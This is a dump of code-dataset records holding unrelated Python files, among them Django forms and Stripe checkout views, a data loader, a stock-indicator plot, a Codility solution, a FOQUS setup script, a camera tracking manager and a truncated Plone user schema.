'bis_serial_number': 'Biometric Scanner Serial Number', 'bis_asset_tag': 'Biometric Scanner Asset Tag', }\n\t\t\n\t\t\n","sub_path":"inventorysite/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166422872","text":"import pandas as pd\nimport psycopg2\nimport config\nimport datetime\nimport re\n\npd.set_option('display.height', 1000)\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\nfile_path = '/home/siem/Documents/Projects/MaketRF/СМИ. Упоминания персон1.xls'\ndata = pd.read_excel(file_path,sheetname='Sheet1')\n\ndef get_int(s):\n if type(s) is int: return s\n try:\n result = re.sub('[^0-9]', '', s)\n except:\n result = s\n return int(result)\n\ndef get_date(d):\n if type(d) is not str: return d\n datestring = d.split(' ')[0]\n return datetime.datetime.strptime(datestring,\"%Y-%m-%d\")\n\nwith psycopg2.connect(**config.connection_main) as conn:\n cur = conn.cursor()\n for i,row in data.iterrows():\n if pd.isnull(row['mentions']): continue\n cur.execute('''\n INSERT INTO smi_persons(person,date,mentions)\n VALUES (%s,%s,%s)\n ''', (row['person'].strip(),get_date(row['date']),get_int(row['mentions'])))\n conn.commit()\n\n","sub_path":"load_smi_dashboard_data.py","file_name":"load_smi_dashboard_data.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"407240340","text":"import numpy as np\nimport mpl_finance as mpf\nimport matplotlib.pyplot as plt\n\n# 读取文件\ndf = pd.read_csv('000001.SZ.csv')\n# 计算KDJ指标\nK, D = talib.STOCH(df['high'], df['low'], df['close'], fastk_period=9, slowk_period=3, slowd_period=3)\nJ = 3*K - 2*D\n# 可视化\nfig = plt.figure()\nax1 = fig.add_subplot(211)\nax2 = fig.add_subplot(212)\n# 绘制K线图\nmpf.candlestick2_ohlc(ax1, df['open'], df['high'], df['low'], df['close'], width=0.6, colorup='red', colordown='green')\n# 绘制KDJ曲线\nax2.plot(0, np.mean(K)) # 使上下坐标对应\nax2.plot(K, label='K')\nax2.plot(D, label='D')\nax2.plot(J, label='J')\n# 显示图像\nplt.legend()\nplt.show()\n","sub_path":"LearnDay/strategy/KDJ.py","file_name":"KDJ.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"6391033","text":"#\n# MinPerimeterRectangle:\n#\n# An integer N is given, representing the area of some rectangle.\n#\n# The area of a rectangle whose sides are of length A and B is A * B,\n# and the perimeter is 2 * (A + B).\n#\n# The goal is to find the minimal perimeter of any rectangle whose\n# area equals N. The sides of this rectangle should be only integers.\n#\n# For example, given integer N = 30, rectangles of area 30 are:\n#\n# (1, 30), with a perimeter of 62,\n# (2, 15), with a perimeter of 34,\n# (3, 10), with a perimeter of 26,\n# (5, 6), with a perimeter of 22.\n# Write a function:\n#\n# class Solution { public int solution(int N); }\n#\n# that, given an integer N, returns the minimal perimeter of any\n# rectangle whose area is exactly equal to N.\n#\n# For example, given an integer N = 30, the function should\n# return 22, as explained above.\n#\n# Write an efficient algorithm for the following assumptions:\n# *\n# N is an integer within the range [1..1,000,000,000].\n#\nimport math\nimport sys\n\n\ndef main():\n doIt(1)\n doIt(24)\n doIt(124)\n doIt(123)\n\n\ndef doIt(N):\n out(\"Answer : {}\".format(solution(N)))\n\n\ndef out(msg):\n print(msg)\n\n\ndef solution(N):\n mx = int(math.ceil(math.sqrt(N)))\n answer = sys.maxsize\n if N % 2 == 0:\n for i in range(1, mx + 1):\n f = int(N / i)\n if f * i == N:\n a = 2 * (f + i)\n if a < answer:\n answer = a\n else:\n for i in range(1, mx + 1, 2):\n f = int(N / i)\n if f * i == N:\n a = 2 * (f + i)\n if a < answer:\n answer = a\n\n return answer\n\nmain()\n","sub_path":"C0dility/python/src/_0010_Prime_and_composite_numbers/MinPerimeterRectangle.py","file_name":"MinPerimeterRectangle.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346914224","text":"#!/usr/bin/env python\n\"\"\"\n setup.py\n\n John Eslick, Carnegie Mellon University, 2014\n\n This Material was produced under the DOE Carbon Capture Simulation\n Initiative (CCSI), and copyright is held by the software owners:\n ORISE, LANS, LLNS, LBL, PNNL, CMU, WVU, et al. The software owners\n and/or the U.S. Government retain ownership of all rights in the\n CCSI software and the copyright and patents subsisting therein. Any\n distribution or dissemination is governed under the terms and\n conditions of the CCSI Test and Evaluation License, CCSI Master\n Non-Disclosure Agreement, and the CCSI Intellectual Property\n Management Plan. No rights are granted except as expressly recited\n in one of the aforementioned agreements.\n\"\"\"\nfrom __future__ import print_function\nfrom setuptools import setup, find_packages\nimport os\n\n# Add build number file to help if BUILD_NUMBER env var is set\n# this is mostly for building on Jenkins, but you could set the\n# env var on a local setup too. If build number doesn't exist\n# it defaults to 0.\nbuild_name = os.environ.get('BUILD_NUMBER', '0')\n# change version.py to include the build_number\nwith open(\"foqus_lib/version/version.template\", 'r') as f:\n verfile = f.read()\nverfile = verfile.replace(\"{BUILDNUMBER}\", build_name)\nwith open(\"foqus_lib/version/version.py\", 'w') as f:\n f.write(verfile)\n#now import version.\nimport foqus_lib.version.version as ver\nprint(\"Setting version as {0}\".format(ver.version))\n\ninstall_requires=[\n 'adodbapi',\n 'TurbineClient',\n 'pyparsing',\n #'py4j',\n 'requests',\n #'networkx',\n #'redis',\n #'logstash_formatter',\n 'matplotlib',\n 'scipy',\n 'numpy',\n 'cma',\n 'pandas'],\n\n#dependency_links=[]\ndependency_links=['git+https://github.com/CCSI-Toolset/turb_client@2.0.0-alpha#egg=TurbineClient']\n\n# Set all the package parameters\npkg_name = \"foqus\"\npkg_version = ver.version\npkg_license = ver.license\npkg_description = \"FOQUS tool for simulation based optimization,\"\\\n \" uncertainty quantification, and surrogate models\"\npkg_author = ver.author\npkg_author_email = ver.support\npkg_maintainer = ver.maintainer\npkg_maintainer_email = ver.maintainer_email\npkg_url = ver.webpage\n\nsetup(\n name = pkg_name,\n version = pkg_version,\n license = pkg_license,\n description = pkg_description,\n author = pkg_author,\n author_email = pkg_author_email,\n maintainer = pkg_maintainer,\n maintainer_email = pkg_maintainer_email,\n url = pkg_url,\n packages = find_packages(),\n include_package_data=True,\n scripts = [\n 'foqus.py',\n 'icons_rc.py',\n 'foqusClient.py'],\n install_requires=install_requires,\n dependency_links=dependency_links\n)\n\nprint(\"\\n\\n\\n\")\nprint(\"==============================================================\")\nprint(\"The following packages can be installed by the user\")\nprint(\"==============================================================\")\nprint(\"PSUADE (Required for UQ features): \")\nprint(\" https://github.com/LLNL/psuade\\n\")\nprint(\"Turbine (Windows only, run Aspen, Excel, and gPROMS): \")\nprint(\" (url tbd)\\n\")\nprint(\"ALAMO (ALAMO Surogate models): \")\nprint(\" (url tbd)\\n\")\nprint(\"NLOpt Python (Additional optimization solvers):\")\nprint(\" https://nlopt.readthedocs.io/en/latest/NLopt_Installation/\\n\")\nprint(\"==============================================================\")\nprint(\"\\n\")\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"469171488","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.models import User\nfrom .models import WithdrawalRequest\nfrom .models import Currency\n\n\nclass SendMoneyForm(forms.Form):\n recipient = forms.CharField(label=_('Recipient'), widget=forms.TextInput(\n attrs={'class': 'form-control find_user', 'placeholder': _('MI-1000000')},\n ))\n amount = forms.DecimalField(label=_('Amount'), widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': _('Amount')},\n ), decimal_places=2, max_digits=12)\n mail_key = forms.IntegerField(label=_('Code from email'), widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': _('Code from email'), 'readonly': 'true'},\n ))\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(SendMoneyForm, self).__init__(*args, **kwargs)\n\n def clean_amount(self):\n data = self.cleaned_data['amount']\n amount = User.objects.select_related('profile').values('profile__bill').get(username=self.user)\n if int(data) > amount['profile__bill']:\n raise forms.ValidationError(_('Ensure this value is less than or equal to {}.'.format(amount['profile__bill'])))\n if data == 0:\n raise forms.ValidationError(_('The minimum amount for transfer must be more then 0'))\n return data\n\n def clean_recipient(self):\n data = self.cleaned_data['recipient']\n current_user = User.objects.select_related('profile').get(username=self.user)\n\n try:\n recipient = User.objects.select_related('profile').get(profile__unique_number=data)\n except User.DoesNotExist:\n recipient = None\n\n if str(data) == str(current_user.profile.unique_number):\n raise forms.ValidationError('Самому себе переводить средства запрещенно')\n elif recipient is None:\n raise forms.ValidationError('Получателя не существует')\n return data\n\n\nclass WithdrawalRequestForm(forms.ModelForm):\n\n class Meta:\n model = WithdrawalRequest\n fields = ('amount', 'currency', 'payment_system', 'account_number',)\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(WithdrawalRequestForm, self).__init__(*args, **kwargs)\n self.fields['currency'].queryset = Currency.objects.filter(active=True)\n\n def clean_amount(self):\n amount = self.cleaned_data['amount']\n if int(amount) < 100:\n raise forms.ValidationError('Сумма для снятия должна быть больше 100')\n if int(amount) > self.user.profile.bill:\n raise forms.ValidationError('У Вас недостаточно средств')\n\n return amount\n","sub_path":"finance/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212450320","text":"from django.conf import settings\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .models import Item, OrderItem, Order, BillingAddress, Payment, Coupon, Refund\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nimport logging\nfrom .forms import CheckoutForm, CouponForm, RefundForm\nfrom django.views.generic import View, ListView, DetailView\n\nimport random\nimport string\nimport stripe\nstripe.api_key = settings.STRIPE_SECRET_KEY\n\n\n\n\n\n# Create your views here.\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=20))\n\ndef products(request):\n context = {\n 'items': Item.objects.all()\n }\n return render(request, \"product.html\", context)\n\n\nclass CheckoutView(View):\n\n def get(self, *args, **kwargs):\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n form = CheckoutForm()\n context = {\n 'form' : form,\n 'couponform' : CouponForm(),\n 'order':order,\n 'DISPLAY_COUPON_FORM' : True\n\n }\n return render(self.request, \"checkout.html\", context)\n except ObjectDoesNotExist:\n messages.info(self.request, \"You do not have a active order\")\n return redirect('core:checkout')\n\n \n def post(self, *args, **kwargs):\n form = CheckoutForm(self.request.POST or None)\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n logging.error(\"%s\",form.is_valid())\n if form.is_valid():\n street_address = form.cleaned_data.get('street_address')\n apartment_address = form.cleaned_data.get('apartment_address')\n country = form.cleaned_data.get('country')\n zip = form.cleaned_data.get('zip')\n same_shipping_address = form.cleaned_data.get('same_shipping_address')\n save_info = form.cleaned_data.get('save_info')\n payment_option = form.cleaned_data.get('payment_option')\n billing_address = BillingAddress(\n user=self.request.user,\n street_address = street_address,\n apartment_address = apartment_address,\n country = country,\n zip = zip)\n billing_address.save()\n order.billing_address = billing_address\n order.save()\n\n if payment_option == 'S':\n return redirect('core:payment', payment_option='stripe')\n elif payment_option == 'P':\n return redirect('core:payment', payment_option='paypal')\n else:\n messages.warning(self.request, \"Invalid payment option selected\")\n return redirect('core:checkout')\n except ObjectDoesNotExist:\n messages.warning(self.request, \"you do not have an active order\")\n return redirect('core:order-summary')\n\n\nclass PaymentView(View):\n\n def get(self, *args, **kwargs):\n order = Order.objects.get(user=self.request.user, ordered=False)\n if order.billing_address:\n context = {\n 'order':order,\n 'DISPLAY_COUPON_FORM' : False\n }\n return render(self.request, \"payment.html\", context)\n else:\n messages.warning(self.request, \"you have not added a billing address\")\n return redirect('core:checkout')\n\n\n\n def post(self, *args, **kwargs):\n order = Order.objects.get(user=self.request.user, ordered=False)\n token = self.request.POST.get('stripeToken')\n amount = int(order.get_total() * 100)\n print(amount)\n\n try:\n # Use Stripe's library to make requests...\n charge = stripe.Charge.create(\n\n shipping={\n 'name': 'Jenny Rosen',\n 'address': {\n 'line1': '510 Townsend St',\n 'postal_code': '98140',\n 'city': 'San Francisco',\n 'state': 'CA',\n 'country': 'US',\n },\n },\n amount=amount,\n currency=\"usd\",\n source=token,\n description=\"My First Test Charge (created for API docs)\"\n )\n\n \n\n\n\n #create the paymment\n payment = Payment()\n payment.stripe_charge_id = charge['id']\n payment.user = self.request.user\n payment.amount = order.get_total()\n payment.save()\n\n\n\n # assign payment to the order\n order_items = order.items.all()\n order_items.update(ordered=True)\n for item in order_items:\n item.save()\n\n order.ordered = True\n order.payment = payment\n order.ref_code = create_ref_code()\n order.save()\n\n messages.success(self.request, \"Your order was successfull\")\n return redirect(\"/\")\n\n except stripe.error.CardError as e:\n # Since it's a decline, stripe.error.CardError will be caught\n body = e.json_body()\n err = body.get('error', {})\n messages.warning(self.request, f\"{err.get('message')}\")\n return redirect(\"/\")\n\n\n except stripe.error.RateLimitError as e:\n # Too many requests made to the API too quickly\n messages.warning(self.request, \"Rate limited error\")\n return redirect(\"/\")\n \n except stripe.error.InvalidRequestError as e:\n # Invalid parameters were supplied to Stripe's API\n print('Status is: %s' % e.http_status)\n print('Type is: %s' % e.error.type)\n print('Code is: %s' % e.error.code)\n # param is '' in this case\n print('Param is: %s' % e.error.param)\n print('Message is: %s' % e.error.message) \n messages.warning(self.request, \"Invalid parameters\")\n return redirect(\"/\")\n\n except stripe.error.AuthenticationError as e:\n # Authentication with Stripe's API failed\n # (maybe you changed API keys recently)\n messages.warning(self.request, \"Not authenticated\")\n return redirect(\"/\")\n\n except stripe.error.APIConnectionError as e:\n # Network communication with Stripe failed\n messages.warning(self.request, \"Network error\")\n return redirect(\"/\")\n\n except stripe.error.StripeError as e:\n # Display a very generic error to the user, and maybe send\n # yourself an email\n messages.warning(self.request, \"SOmething went wrong. You were not charged. Please try again\")\n return redirect(\"/\")\n\n except Exception as e:\n # Something else happened, completely unrelated to Stripe\n\n print('Status is: %s' % e.http_status)\n print('Type is: %s' % e.error.type)\n print('Code is: %s' % e.error.code)\n # param is '' in this case\n print('Param is: %s' % e.error.param)\n print('Message is: %s' % e.error.message) \n \n messages.warning(self.request, \"Serious CardError\")\n\n \n\n\n \n \n \n\nclass HomeView(ListView):\n model = Item\n paginate_by = 10\n ordering = ['slug']\n template_name= \"home.html\"\n\ndef home(request):\n context = {\n 'items': Item.objects.all()\n }\n return render(request, \"home.html\", context)\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n def get(self, *args, **kwargs):\n\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n context = {\n 'object': order\n }\n return render(self.request, \"order_summary.html\", context)\n except ObjectDoesNotExist:\n messages.warning(self.request, \"you do not have an active order\")\n return redirect(\"/\")\n\nclass ItemDetailView(DetailView):\n model = Item\n template_name = \"product.html\"\n\n@login_required\ndef add_to_cart(request, slug):\n item = get_object_or_404(Item, slug=slug)\n order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)\n order_qs = Order.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n logging.error(\"%s\", order_qs)\n logging.error(\"%s\", order.items.filter(item__slug=item.slug))\n if order.items.filter(item__slug=item.slug).exists():\n order_item.quantity +=1\n order_item.save()\n messages.info(request, \"This item quantity was updated\")\n return redirect('core:order-summary')\n else:\n order.items.add(order_item)\n messages.info(request, \"This item was added to your cart\")\n return redirect('core:order-summary')\n\n else:\n ordered_date = timezone.now()\n order = Order.objects.create(user=request.user, ordered_date=ordered_date)\n order.items.add(order_item)\n messages.info(request, \"This item was added to your cart\")\n return redirect('core:order-summary')\n\n\n\n\n@login_required\ndef remove_from_cart(request, slug):\n item = get_object_or_404(Item, slug=slug)\n order_qs = Order.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n if order.items.filter(item__slug=item.slug).exists():\n order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)\n\n order.items.remove(order_item)\n order_item.delete()\n messages.info(request, \"This item was removed to your cart\")\n return redirect('core:order-summary')\n else:\n messages.info(request, \"This item was not in your cart\")\n return redirect('core:product', slug=slug)\n else:\n messages.info(request, \"You do not have active cart\")\n return redirect('core:product', slug=slug)\n\n\n\n@login_required\ndef remove_single_item_from_cart(request, slug):\n item = get_object_or_404(Item, slug=slug)\n order_qs = Order.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n if order.items.filter(item__slug=item.slug).exists():\n order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)\n if order_item.quantity > 1:\n order_item.quantity -=1\n order_item.save()\n else:\n order.items.remove(order_item)\n messages.info(request, \"This item was updated\")\n return redirect('core:order-summary')\n else:\n messages.info(request, \"This item was not in your cart\")\n return redirect('core:product', slug=slug)\n\n else:\n messages.info(request, \"You do not have active cart\")\n return redirect('core:product', slug=slug)\n\n return redirect('core:product', slug=slug)\n\n\n\n\ndef get_coupon(request, code):\n try:\n coupon = Coupon.objects.get(code=code)\n return coupon\n except ObjectDoesNotExist:\n messages.info(request, \"This coupon does not exist\")\n return redirect(\"core:checkout\")\n\n\nclass AddCouponView(View):\n def post(self, *args, **kwargs):\n form = CouponForm(request.POST or None)\n if form.is_valid():\n try:\n code = form.cleaned_data.get('code')\n order = Order.objects.get(user=self.request.user, ordered=False)\n order.coupon = get_coupon(self.request, code)\n order.save()\n\n messages.info(self.request, \"successfully added the coupon\")\n return redirect('core:checkout')\n except ObjectDoesNotExist:\n messages.info(self.request, \"You do not have a active order\")\n return redirect('core:checkout')\n\n \nclass RequestRefundView(View):\n\n def get(self, *args, **kwargs):\n form = RefundForm()\n context = {\n 'form':form\n }\n return render(self.request, \"request_refund.html\", context)\n\n\n def post(self, *args, **kwargs):\n form = RefundForm(self.request.POST)\n if form.is_valid():\n ref_code = form.cleaned_data.get('ref_code')\n message = form.cleaned_data.get('message')\n email = form.cleaned_data.get('email')\n\n\n #edit the order\n try:\n order = Order.objects.get(ref_code=ref_code)\n order.refund_requested = True\n order.save()\n\n #store the order\n refund = Refund()\n refund.order = order\n refund.reason = message\n refund.email = email\n refund.save()\n messages.info(self.request, \"Your request was recevied\")\n return redirect(\"core:request-refund\")\n except ObjectDoesNotExist:\n messages.info(self.request, \"This order does not exist\")\n return redirect(\"core:request-refund\")","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"64963193","text":"\"\"\"Handles the camera processing.\"\"\"\n\nimport multiprocessing\nimport asyncio\nfrom concurrent.futures import ProcessPoolExecutor\nimport cv2\nfrom .camera import Camera\nfrom .yolo_people_detector import YoloPeopleDetector\nfrom .hog_people_detector import HogPeopleDetector\nfrom .hog_grayscale_people_detector import HogGrayscalePeopleDetector\nfrom .motion_people_detector import MotionPeopleDetector\n\n\nDEFAULT_DETECTOR = 'yolo'\nDETECTORS = {\n 'yolo': YoloPeopleDetector,\n 'hog': HogPeopleDetector,\n 'hog_gray': HogGrayscalePeopleDetector,\n 'motion': MotionPeopleDetector,\n}\nDEFAULT_PEOPLE_GROUP = 'average'\nPEOPLE_GROUPS = ['average', 'track']\n\n\ndef start_camera(frame_queue, frame_result_queue, return_frame, detection_active,\n camera_calibration_requests, camera_calibration_responses) -> None:\n \"\"\"Starts the camera in a subprocess.\"\"\"\n camera = Camera(frame_queue, frame_result_queue, return_frame, detection_active,\n camera_calibration_requests, camera_calibration_responses)\n camera.process()\n\n\ndef start_detector(frame_queue, frame_result_queue, return_frame, coordinate_queue,\n detector_algorithm, people_group) -> None:\n \"\"\"Starts the people detector in a subprocess.\"\"\"\n detector = None\n\n if detector_algorithm not in DETECTORS:\n raise RuntimeError('Unknown detection algorithm: {}'.format(detector_algorithm))\n\n if people_group not in PEOPLE_GROUPS:\n raise RuntimeError('Unknown people group algorithm: {}'.format(people_group))\n\n detector = DETECTORS[detector_algorithm](frame_queue, frame_result_queue, return_frame,\n coordinate_queue, people_group)\n detector.process()\n\n\nclass TrackingManager:\n \"\"\"The tracking manager can start or stop the camera tracking and forward callbacks.\"\"\"\n\n def __init__(self, config):\n self.config = config\n self.camera_process = None\n self.detector_process = None\n self.detector = DEFAULT_DETECTOR\n self.people_group = DEFAULT_PEOPLE_GROUP\n self.on_frame = None\n self.config.setting_repository.register_listener(self.on_settings_changed)\n self.previous_config_value = self.config.balance\n self.camera_listeners = 0\n self.cluster_slave = None\n\n manager = multiprocessing.Manager()\n self.frame_queue = manager.Queue()\n self.frame_result_queue = manager.Queue()\n self.camera_calibration_requests = manager.Queue()\n self.camera_calibration_responses = manager.Queue()\n self.coordinate_queue = manager.Queue()\n self.detection_active = manager.Event()\n self.return_frame = manager.Event()\n\n async def on_settings_changed(self) -> None:\n \"\"\"Update the tracking status when the settings have changed.\"\"\"\n if self.config.balance and self.config.balance != self.previous_config_value:\n self.acquire_camera()\n self.start_detector()\n elif self.config.balance is False and self.config.balance != self.previous_config_value:\n self.release_camera()\n self.stop_detector()\n\n self.previous_config_value = self.config.balance\n\n def is_camera_active(self) -> bool:\n \"\"\"Returns whether the camera is active.\n\n :returns: True if the camera is active\n :rtype: bool\n \"\"\"\n return self.camera_process is not None\n\n def acquire_camera(self) -> None:\n \"\"\"Ensures the tracking is running.\"\"\"\n if self.camera_process is None:\n self.start_camera()\n\n self.camera_listeners += 1\n print('[Tracking] Camera acquired ({})'.format(self.camera_listeners))\n\n def release_camera(self) -> None:\n \"\"\"Releases the camera and stops it if no other listeners are connected.\"\"\"\n self.camera_listeners -= 1\n print('[Tracking] Camera released ({})'.format(self.camera_listeners))\n\n if self.camera_listeners == 0:\n self.stop_camera()\n\n def start_camera(self) -> None:\n \"\"\"Start the camera tracking.\"\"\"\n if self.camera_process is None:\n print('[Tracking] Starting camera')\n self.camera_process = multiprocessing.Process(\n target=start_camera, args=(self.frame_queue, self.frame_result_queue,\n self.return_frame, self.detection_active,\n self.camera_calibration_requests,\n self.camera_calibration_responses, ))\n self.camera_process.start()\n\n def start_detector(self) -> None:\n \"\"\"Start the people detector.\"\"\"\n if self.detector_process is None:\n print('[Tracking] Starting people detector: {}, {}'.format(self.detector,\n self.people_group))\n self.detection_active.set()\n self.detector_process = multiprocessing.Process(\n target=start_detector, args=(self.frame_queue, self.frame_result_queue,\n self.return_frame, self.coordinate_queue,\n self.detector, self.people_group, ))\n self.detector_process.start()\n\n def stop_camera(self) -> None:\n \"\"\"Stop the current camera tracking.\"\"\"\n if self.camera_process is not None:\n print('[Tracking] Stopping camera')\n self.camera_process.kill()\n self.camera_process = None\n\n def stop_detector(self) -> None:\n \"\"\"Stop the people detector.\"\"\"\n if self.detector_process is not None:\n print('[Tracking] Stopping people detector')\n self.detection_active.clear()\n self.detector_process.kill()\n self.detector_process = None\n\n async def await_frames(self) -> None:\n \"\"\"Awaits result frames and passes them to the listener.\"\"\"\n executor = ProcessPoolExecutor(max_workers=1)\n loop = asyncio.get_running_loop()\n\n while True:\n frame = await loop.run_in_executor(executor, self.frame_result_queue.get)\n if self.on_frame is not None:\n # convert frame to jpeg\n try:\n if frame is None:\n self.on_frame(None)\n else:\n _, jpeg_frame = cv2.imencode('.jpg', frame)\n self.on_frame(jpeg_frame)\n except TypeError:\n self.on_frame = None\n print('Error occurred in the on_frame callback, it will automatically get '\n + 'unregistered')\n\n async def await_coordinates(self) -> None:\n \"\"\"Awaits coordinates and passes them to the repository.\"\"\"\n executor = ProcessPoolExecutor(max_workers=1)\n loop = asyncio.get_running_loop()\n\n while True:\n coordinate = await loop.run_in_executor(executor, self.coordinate_queue.get)\n await self.config.tracking_repository.update_coordinate(coordinate)\n\n async def await_camera_calibration_responses(self) -> None:\n \"\"\"Awaits camera calibration responses and passes them to the cluster slave.\"\"\"\n executor = ProcessPoolExecutor(max_workers=1)\n loop = asyncio.get_running_loop()\n\n while True:\n count, image = await loop.run_in_executor(executor,\n self.camera_calibration_responses.get)\n if self.cluster_slave is not None:\n self.cluster_slave.send_camera_calibration_response(count, image)\n\n def set_frame_callback(self, on_frame: callable) -> None:\n \"\"\"Sets the `on_frame` callback that will receive every processed frame.\n If the tracking is not started, a RuntimeError will be raised.\n\n :param callable on_frame: Callback that receives the `numpy.ndarray` frame as the first\n argument\n \"\"\"\n self.on_frame = on_frame\n\n if self.on_frame is not None:\n self.return_frame.set()\n else:\n self.return_frame.clear()\n\n def send_camera_calibration_request(self, start: bool, finish: bool, repeat: bool,\n cluster_slave) -> None:\n \"\"\"Sends a camera calibration request to the camera process.\n\n :param bool start: If true, a new calibration will be started\n :param bool finish: If true, the current calibration will be finished\n :param bool repeat: If true, the current step will be repeated\n \"\"\"\n self.cluster_slave = cluster_slave\n self.camera_calibration_requests.put_nowait((start, finish, repeat))\n\n def set_detector(self, detector: str) -> None:\n \"\"\"Sets the detection algorithm.\n\n :param str detector: New detection algorithm\n \"\"\"\n if self.detector != detector:\n self.detector = detector\n\n if self.detector_process is not None:\n self.stop_detector()\n self.start_detector()\n\n def set_people_group(self, people_group: str) -> None:\n \"\"\"Sets the algorithm used to calculate the coordinate in case of multiple people detected.\n\n :param str people_group: New people group algorithm\n \"\"\"\n if self.people_group != people_group:\n self.people_group = people_group\n\n if self.detector_process is not None:\n self.stop_detector()\n self.start_detector()\n","sub_path":"backend/src/tracking/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":9580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"313918849","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\nurlpatterns=[\r\n\turl(r'^create/$',views.order_create,name='order_create'),\r\n\turl(r'^admin/order/(?P\\d+)/$',views.admin_order_detail,name='admin_order_detail'),\r\n\turl(r'^orderlist/$',views.order_list,name='order_list'),\r\n\turl(r'^(?P\\d+)/$',views.order_detail,name='order_detail'),\r\n\turl(r'^verify/(?P\\d+)/$',views.VerifyOrder,name='verify'),\r\n\turl(r'^repay/(?P\\d+)/$',views.repay,name='repay'),\r\n]","sub_path":"September/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570771169","text":"from zope.interface import implements\nfrom zope.schema import Int, Choice, TextLine, Date, List, Bool\nfrom zope.schema.vocabulary import SimpleVocabulary, SimpleTerm\nfrom plone.app.users.userdataschema import IUserDataSchemaProvider\nfrom plone.app.users.userdataschema import IUserDataSchema\nfrom emas.theme import MessageFactory as _\n\nroles = SimpleVocabulary([\n SimpleTerm(value=u'Learner', title=_(u'Learner')),\n SimpleTerm(value=u'Educator', title=_(u'Educator')),\n SimpleTerm(value=u'Curriculum specialist',\n title=_(u'Curriculum specialist')),\n SimpleTerm(value=u'Other', title=_(u'Other'))\n ])\n\nprovinces = SimpleVocabulary([\n SimpleTerm(value=u'Eastern Cape', title=_(u'Eastern Cape')),\n SimpleTerm(value=u'Free State', title=_(u'Free State')),\n SimpleTerm(value=u'Gauteng', title=_(u'Gauteng')),\n SimpleTerm(value=u'KwaZulu-Natal', title=_(u'KwaZulu-Natal')),\n SimpleTerm(value=u'Limpopo', title=_(u'Limpopo')),\n SimpleTerm(value=u'Mpumalanga', title=_(u'Mpumalanga')),\n SimpleTerm(value=u'Northern Cape', title=_(u'Northern Cape')),\n SimpleTerm(value=u'North West', title=_(u'North West')),\n SimpleTerm(value=u'Western Cape', title=_(u'Western Cape')),\n ])\n\naccess_types = SimpleVocabulary([\n SimpleTerm(value=u'maths-grade-10', title=_(u'Maths grade 10')),\n SimpleTerm(value=u'maths-grade-11', title=_(u'Maths grade 11')),\n SimpleTerm(value=u'maths-grade-12', title=_(u'Maths grade 12')),\n SimpleTerm(value=u'science-grade-10', title=_(u'Science grade 10')),\n SimpleTerm(value=u'science-grade-11', title=_(u'Science grade 11')),\n SimpleTerm(value=u'science-grade-12', title=_(u'Science grade 12')),\n ])\n\nclass IEmasUserDataSchema(IUserDataSchema):\n # Credits stored as an integer\n credits = Int(\n title=_(u'questions', default=u'Questions'),\n description=_(u'help_questions',\n default=u\"Question balance for Expert Answers service\"),\n default=0,\n required=False)\n\n userrole = Choice(\n title=_(u\"Role\"),\n vocabulary=roles,\n required=False,\n )\n\n school = TextLine(\n title=_(u'label_school', default=u'School Name'),\n required=False,\n default=u\"\",\n )\n\n province = Choice(\n title=_(u\"label_province\", default=u'Province'),\n vocabulary=provinces,\n required=False,\n )\n\n trialuser = Bool(\n title=_(u'label_trialuser', default=u'Trial User'),\n required=True,\n default=True,\n )\n\n askanexpert_registrationdate = Date(\n title=_(u\"label_askanexpert_registrationdate\",\n default=\"Ask an expert - registration date.\"),\n required=False,\n )\n\n answerdatabase_registrationdate = Date(\n title=_(u\"label_answerdatebase_registrationdate\",\n default=\"Answer datebase - registration date.\"),\n required=False,\n )\n\n moreexercise_registrationdate = Date(\n title=_(u\"label_moreexercise_registrationdate\",\n default=\"More exercise - registration date.\"),\n required=False,\n )\n\n answerdatabase_expirydate = Date(\n title=_(u\"label_answerdatebase_expirydate\",\n default=\"Answer 